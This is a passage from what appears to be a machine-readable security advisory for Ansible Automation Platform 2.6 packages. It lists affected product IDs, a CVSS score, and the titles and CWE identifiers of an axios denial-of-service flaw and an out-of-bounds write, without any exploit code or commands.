"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25990",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-02-11T21:05:39.535631+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
